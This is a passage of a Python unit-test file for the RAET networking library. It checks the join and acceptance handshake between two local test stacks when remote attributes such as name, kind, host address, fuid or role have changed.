self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid, duration=0.50)
# Action: Pend, Dump
for stack in [alpha, beta]:
# self.assertEqual(len(stack.transactions), 1) #b=0
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.name, newName)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousPendingPendNewMain(self):
'''
Test mutable joiner pend pending non vacuous join with updated main (M2)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendNewMain.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
# Main: New (set main to false in betaRemote)
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=False,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Pending
beta.keep.pendRemote(betaRemote)
# Name: Either
# Main: New
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid, duration=0.50)
# Action: Pend, Dump
for stack in [alpha, beta]:
# self.assertEqual(len(stack.transactions), 1) #b=0
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.main, alpha.main)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousPendingPendNewKind(self):
'''
Test mutable joiner pend pending non vacuous join with updated kind (M3)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendNewKind.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Pending
beta.keep.pendRemote(betaRemote)
# Name: Either
# Main: Either
# Kind: New
oldKind = alpha.kind
newKind = 33
self.assertIs(alpha.kind, oldKind)
alpha.kind = newKind
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
# self.assertEqual(len(stack.transactions), 1) #b=0
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.kind, newKind)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousPendingPendNewRha(self):
'''
Test mutable joiner pend pending vacuous join with updated host address (M4)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendNewRha.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Pending
beta.keep.pendRemote(betaRemote)
# Name: Either
# Main: Either
# Kind: Either
# RHA: New
# 1. Initiate join with initHa
# 2. Set betaRemote.ha = fakeHa
# 3. Accept alpha responce:
# - alpha will respond with initHa
# - beta will know fakeHa
initHa = (alpha.local.ha[0], alpha.local.ha[1])
fakeHa = (alpha.local.ha[0], 7532)
self.assertNotEqual(initHa, fakeHa)
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
console.terse("\nJoin Transaction **************\n")
beta.join(uid=betaRemote.nuid)
betaRemote.ha = fakeHa
# Keep beta values here, before accept. Accept will change it because not same all
keep = self.copyData(betaRemote)
self.serviceStacks([alpha, beta], duration=0.50)
# Action: Pend, Dump
for stack in [alpha, beta]:
# self.assertEqual(len(stack.transactions), 1) #b=0
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.ha, alpha.local.ha)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousPendingPendNewFuid(self):
'''
Test mutable joiner pend pending vacuous join with updated fuid/reid (M5)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendNewFuid.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Pending
beta.keep.pendRemote(betaRemote)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: New:
# 1. Initiate join with initFuid
# 2. Update betaRemote.fuid = fakeFuid
# 3. Accept alpha responce:
# - alpha will respond with initFuid
# - beta will know fakeFuid
initFuid = alphaRemote.nuid
fakeFuid = initFuid + 10
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote, fuid=fakeFuid)
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
console.terse("\nJoin Transaction **************\n")
beta.join(uid=betaRemote.nuid)
betaRemote.fuid = fakeFuid
self.serviceStacks([alpha, beta], duration=0.50)
# Action: Pend, Dump
for stack in [alpha, beta]:
# self.assertEqual(len(stack.transactions), 1) #b=0
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.fuid, initFuid)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousPendingPendNewRole(self):
'''
Test mutable joiner pend pending non vacuous join with updated role (M6)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendNewRole.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Pending
beta.keep.pendRemote(betaRemote)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: New
oldRole = alpha.local.role
newRole = '{0}_new'.format(oldRole)
alpha.local.role = newRole
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Ensure beta knows nothing about the newRole
roleData = beta.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid, duration=0.50)
# Action: Pend, Dump
for stack in [alpha, beta]:
# self.assertEqual(len(stack.transactions), 1) #b=0
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertFalse(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.role, newRole)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousPendingPendSameAll(self):
'''
Test mutable joiner pend pending non vacuous join with same all (N1)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendSameAll.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Pending
beta.keep.pendRemote(betaRemote)
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Old
# Leid: Old
# Reid: Old
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True, duration=0.50)
# Action: Pend, Dump
for stack in [alpha, beta]:
# self.assertEqual(len(stack.transactions), 1) #b=0
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousImmutableRefuseRenew(self):
'''
Test immutable joiner don't start (refuse) vacuous renew (Z1)
'''
console.terse("{0}\n".format(self.testJoinerVacuousImmutableRefuseRenew.__doc__))
alpha, alphaData = self.bootstrapStack(name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.always.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(alpha.local.role, 'alpha')
self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
beta, betaData = self.bootstrapStack(name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=raeting.AutoMode.always.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(beta.local.role, 'beta')
self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
# Do initial join vacuous join to setup rejoin with renew
# create remote to join to alpha
remote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
self.join(beta, alpha, deid=remote.uid)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
